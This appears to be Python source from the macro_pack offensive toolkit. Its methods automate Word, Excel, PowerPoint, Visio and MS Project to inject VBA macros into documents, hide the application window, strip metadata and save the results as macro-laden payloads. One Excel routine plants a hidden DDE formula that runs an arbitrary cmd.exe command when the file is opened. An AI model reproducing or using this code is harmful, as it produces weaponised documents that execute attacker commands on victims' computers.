def generate(self): logging.info(" [+] Generating MSProject project...") try: self.enableVbom() logging.info(" [-] Open MSProject project...") # open up an instance of Word with the win32com driver MSProject = win32com.client.Dispatch("MSProject.Application") project = MSProject.Projects.Add() # do the operation in background MSProject.Visible = False self.resetVBAEntryPoint() logging.info(" [-] Inject VBA...") # Read generated files for vbaFile in self.getVBAFiles(): if vbaFile == self.getMainVBAFile(): with open (vbaFile, "r") as f: # Add the main macro- into ThisProject part of Word project ProjectModule = project.VBProject.VBComponents("ThisProject") macro=f.read() ProjectModule.CodeModule.AddFromString(macro) else: # inject other vba files as modules with open (vbaFile, "r") as f: macro=f.read() ProjectModule = project.VBProject.VBComponents.Add(1) ProjectModule.Name = os.path.splitext(os.path.basename(vbaFile))[0] ProjectModule.CodeModule.AddFromString(macro) # Remove Informations #logging.info(" [-] Remove hidden data and personal info...") #project.RemoveFileProperties = 1 logging.info(" [-] Save MSProject project...") pjMPP = 0 # The file was saved with the current version of Microsoft Office MSProject. project.SaveAs(self.outputFilePath,Format = pjMPP) # save the project and close MSProject.FileClose () MSProject.Quit() # garbage collection del MSProject self.disableVbom() logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath)) logging.info(" [-] Test with : \n%s --run %s\n" % (getRunningApp(),self.outputFilePath)) except Exception: logging.exception(" [!] Exception caught!") logging.error(" [!] Hints: Check if MS Project is really closed and Antivirus did not catch the files") logging.error(" [!] Attempt to force close MS Project applications...") objProject = win32com.client.Dispatch("MSProject.Application") objProject.Application.Quit() # If it Application.Quit() was not enough we force kill the process if utils.checkIfProcessRunning("winproj.exe"): utils.forceProcessKill("winproj.exe") del objProject
def generate(self): logging.info(" [+] Generating MS PowerPoint document...") try: self.enableVbom() # open up an instance of PowerPoint with the win32com driver ppt = win32com.client.Dispatch("PowerPoint.Application") logging.info(" [-] Open presentation...") presentation = ppt.Presentations.Add(WithWindow = False) self.resetVBAEntryPoint() logging.info(" [-] Inject VBA...") # Read generated files for vbaFile in self.getVBAFiles(): # Inject all vba files as modules with open (vbaFile, "r") as f: macro=f.read() pptModule = presentation.VBProject.VBComponents.Add(1) pptModule.Name = os.path.splitext(os.path.basename(vbaFile))[0] pptModule.CodeModule.AddFromString(macro) # Remove Informations logging.info(" [-] Remove hidden data and personal info...") ppRDIAll=99 presentation.RemoveDocumentInformation(ppRDIAll) logging.info(" [-] Save presentation...") pptXMLFileFormatMap = {".pptm": 25, ".potm": 27} if MSTypes.PPT == self.outputFileType: presentation.SaveAs(self.outputFilePath, FileFormat=pptXMLFileFormatMap[self.outputFilePath[-5:]]) # save the presentation and close ppt.Presentations(1).Close() ppt.Quit() # garbage collection del ppt self.disableVbom() logging.info(" [-] Inject Custom UI...") self._injectCustomUi() logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath)) logging.info(" [-] Test with : \n%s --run %s\n" % (utils.getRunningApp(),self.outputFilePath)) except Exception: logging.exception(" [!] Exception caught!") logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files") logging.error(" [!] Attempt to force close MS Powerpoint application...") ppt = win32com.client.Dispatch("PowerPoint.Application") ppt.Quit() # If it Application.Quit() was not enough we force kill the process if utils.checkIfProcessRunning("powerpnt.exe"): utils.forceProcessKill("powerpnt.exe") del ppt
def generate(self): logging.info(" [+] Generating MS Visio document...") try: self.enableVbom() logging.info(" [-] Open document...") # open up an instance of Visio with the win32com driver visio = win32com.client.Dispatch("Visio.InvisibleApp") # do the operation in background without actually opening Visio document = visio.Documents.Add("") logging.info(" [-] Save document format...") document.SaveAs(self.outputFilePath) self.resetVBAEntryPoint() logging.info(" [-] Inject VBA...") # Read generated files for vbaFile in self.getVBAFiles(): if vbaFile == self.getMainVBAFile(): with open (vbaFile, "r") as f: macro=f.read() visioModule = document.VBProject.VBComponents("ThisDocument") visioModule.CodeModule.AddFromString(macro) else: # inject other vba files as modules with open (vbaFile, "r") as f: macro=f.read() visioModule = document.VBProject.VBComponents.Add(1) visioModule.Name = os.path.splitext(os.path.basename(vbaFile))[0] visioModule.CodeModule.AddFromString(macro) # Remove Informations logging.info(" [-] Remove hidden data and personal info...") document.RemovePersonalInformation = True # save the document and close document.Save() document.Close() visio.Application.Quit() # garbage collection del visio self.disableVbom() logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath)) logging.info(" [-] Test with : \n%s --run %s\n" % (utils.getRunningApp(),self.outputFilePath)) except Exception: logging.exception(" [!] Exception caught!") logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files") logging.error(" [!] Attempt to force close MS Visio applications...") visio = win32com.client.Dispatch("Visio.InvisibleApp") visio.Application.Quit() # If it Application.Quit() was not enough we force kill the process if utils.checkIfProcessRunning("visio.exe"): utils.forceProcessKill("visio.exe")
def run(self): logging.info(" [+] Generating MS Excel with DDE document...") try: # Get command line paramDict = OrderedDict([("Cmd_Line", None)]) self.fillInputParams(paramDict) command = paramDict["Cmd_Line"] logging.info(" [-] Open document...") # open up an instance of Excel with the win32com driver\ \\ excel = win32com.client.Dispatch("Excel.Application") # do the operation in background without actually opening Excel #excel.Visible = False workbook = excel.Workbooks.Open(self.outputFilePath) logging.info(" [-] Inject DDE field (Answer 'No' to popup)...") ddeCmd = r"""=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c %s'!A1""" % command.rstrip( ) excel.Cells(1, 26).Formula = ddeCmd excel.Cells(1, 26).FormulaHidden = True # Remove Informations logging.info(" [-] Remove hidden data and personal info...") xlRDIAll = 99 workbook.RemoveDocumentInformation(xlRDIAll) logging.info(" [-] Save Document...") excel.DisplayAlerts = False excel.Workbooks(1).Close(SaveChanges=1) excel.Application.Quit() # garbage collection del excel logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath)) except Exception: logging.exception(" [!] Exception caught!") logging.error( " [!] Hints: Check if MS office is really closed and Antivirus did not catch the files" ) logging.error( " [!] Attempt to force close MS Excel applications...") objExcel = win32com.client.Dispatch("Excel.Application") objExcel.Application.Quit() del objExcel # If it Application.Quit() was not enough we force kill the process if utils.checkIfProcessRunning("Excel.exe"): utils.forceProcessKill("Excel.exe")
def check(self): logging.info(" [-] Check feasibility...") if utils.checkIfProcessRunning("powerpnt.exe"): logging.error(" [!] Cannot generate PowerPoint payload if PowerPoint is already running.") if utils.yesOrNo(" Do you want macro_pack to kill PowerPoint process? "): utils.forceProcessKill("powerpnt.exe") else: return False try: ppt = win32com.client.Dispatch("PowerPoint.Application") ppt.Quit() del ppt except: logging.error(" [!] Cannot access PowerPoint.Application object. Is software installed on machine? Abort.") return False return True
def check(self): logging.info(" [-] Check feasibility...") if utils.checkIfProcessRunning("winproj.exe"): logging.error(" [!] Cannot generate MS Project payload if Project is already running.") if self.mpSession.forceYes or utils.yesOrNo(" Do you want macro_pack to kill Ms Project process? "): utils.forceProcessKill("winproj.exe") else: return False try: objProject = win32com.client.Dispatch("MSProject.Application") objProject.Application.Quit() del objProject except: logging.error(" [!] Cannot access MSProject.Application object. Is software installed on machine? Abort.") return False return True
def check(self): logging.info(" [-] Check feasibility...") if utils.checkIfProcessRunning("visio.exe"): logging.error(" [!] Cannot generate Visio payload if Visio is already running.") if utils.yesOrNo(" Do you want macro_pack to kill Visio process? "): utils.forceProcessKill("visio.exe") else: return False # Check nb of source file try: objVisio = win32com.client.Dispatch("Visio.InvisibleApp") objVisio.Application.Quit() del objVisio except: logging.error(" [!] Cannot access Visio.InvisibleApp object. Is software installed on machine? Abort.") return False return True
def check(self): logging.info(" [-] Check feasibility...") if utils.checkIfProcessRunning("winword.exe"): logging.error( " [!] Cannot generate Word payload if Word is already running." ) if utils.yesOrNo(" Do you want macro_pack to kill Word process? "): utils.forceProcessKill("winword.exe") else: return False try: objWord = win32com.client.Dispatch("Word.Application") objWord.Application.Quit() del objWord except: logging.error( " [!] Cannot access Word.Application object. Is software installed on machine? Abort." ) return False return True
def generate(self): logging.info(" [+] Generating MS Excel document...") try: self.enableVbom() # open up an instance of Excel with the win32com driver\ \\ excel = win32com.client.Dispatch("Excel.Application") # do the operation in background without actually opening Excel excel.Visible = False # open the excel workbook from the specified file or create if file does not exist logging.info(" [-] Open workbook...") workbook = excel.Workbooks.Add() self.resetVBAEntryPoint() logging.info(" [-] Inject VBA...") # Read generated files for vbaFile in self.getVBAFiles(): logging.debug(" [,] Loading %s " % vbaFile) if vbaFile == self.getMainVBAFile(): with open(vbaFile, "r") as f: macro = f.read() # Add the main macro- into ThisWorkbook part of excel file excelModule = workbook.VBProject.VBComponents( "ThisWorkbook") excelModule.CodeModule.AddFromString(macro) else: # inject other vba files as modules with open(vbaFile, "r") as f: macro = f.read() excelModule = workbook.VBProject.VBComponents.Add(1) excelModule.Name = os.path.splitext( os.path.basename(vbaFile))[0] excelModule.CodeModule.AddFromString(macro) excel.DisplayAlerts = False # Remove Informations logging.info(" [-] Remove hidden data and personal info...") xlRDIAll = 99 workbook.RemoveDocumentInformation(xlRDIAll) logging.info(" [-] Save workbook...") xlExcel8 = 56 xlXMLFileFormatMap = {".xlsx": 51, ".xlsm": 52, ".xltm": 53} if self.outputFileType == MSTypes.XL97: workbook.SaveAs(self.outputFilePath, FileFormat=xlExcel8) elif MSTypes.XL == self.outputFileType: workbook.SaveAs( self.outputFilePath, FileFormat=xlXMLFileFormatMap[self.outputFilePath[-5:]]) # save the workbook and close excel.Workbooks(1).Close(SaveChanges=1) excel.Application.Quit() # garbage collection del excel self.disableVbom() if self.mpSession.ddeMode: # DDE Attack mode self.insertDDE() logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath)) logging.info(" [-] Test with : \n%s --run %s\n" % (utils.getRunningApp(), self.outputFilePath)) except Exception: logging.exception(" [!] Exception caught!") logging.error( " [!] Hints: Check if MS office is really closed and Antivirus did not catch the files" ) logging.error( " [!] Attempt to force close MS Excel applications...") objExcel = win32com.client.Dispatch("Excel.Application") objExcel.Application.Quit() # If it Application.Quit() was not enough we force kill the process if utils.checkIfProcessRunning("Excel.exe"): utils.forceProcessKill("Excel.exe") del objExcel
def generate(self): logging.info(" [+] Generating MS Word document...") try: self.enableVbom() logging.info(" [-] Open document...") # open up an instance of Word with the win32com driver word = win32com.client.Dispatch("Word.Application") # do the operation in background without actually opening Excel word.Visible = False document = word.Documents.Add() logging.info(" [-] Save document format...") wdFormatDocument = 0 wdXMLFileFormatMap = {".docx": 12, ".docm": 13, ".dotm": 15} if MSTypes.WD97 == self.outputFileType: document.SaveAs(self.outputFilePath, FileFormat=wdFormatDocument) elif MSTypes.WD == self.outputFileType: document.SaveAs( self.outputFilePath, FileFormat=wdXMLFileFormatMap[self.outputFilePath[-5:]]) self.resetVBAEntryPoint() logging.info(" [-] Inject VBA...") # Read generated files for vbaFile in self.getVBAFiles(): logging.debug(" -> File %s" % vbaFile) if vbaFile == self.getMainVBAFile(): with open(vbaFile, "r") as f: # Add the main macro- into ThisDocument part of Word document wordModule = document.VBProject.VBComponents( "ThisDocument") macro = f.read() #logging.info(macro) wordModule.CodeModule.AddFromString(macro) else: # inject other vba files as modules with open(vbaFile, "r") as f: macro = f.read() #logging.info(macro) wordModule = document.VBProject.VBComponents.Add(1) wordModule.Name = os.path.splitext( os.path.basename(vbaFile))[0] wordModule.CodeModule.AddFromString(macro) document.Application.Options.Pagination = False document.UndoClear() document.Repaginate() document.Application.ScreenUpdating = True document.Application.ScreenRefresh() #logging.info(" [-] Saving module %s..." % wordModule.Name) document.Save() #word.DisplayAlerts=False # Remove Informations logging.info(" [-] Remove hidden data and personal info...") wdRDIAll = 99 document.RemoveDocumentInformation(wdRDIAll) # save the document and close document.Save() document.Close() word.Application.Quit() # garbage collection del word self.disableVbom() if self.mpSession.ddeMode: # DDE Attack mode self.insertDDE() logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath)) logging.info(" [-] Test with : \n%s --run %s\n" % (utils.getRunningApp(), self.outputFilePath)) except Exception: logging.exception(" [!] Exception caught!") logging.error( " [!] Hints: Check if MS office is really closed and Antivirus did not catch the files" ) logging.error(" [!] Attempt to force close MS Word...") objWord = win32com.client.Dispatch("Word.Application") objWord.Application.Quit() # If it Application.Quit() was not enough we force kill the process if utils.checkIfProcessRunning("winword.exe"): utils.forceProcessKill("winword.exe") del objWord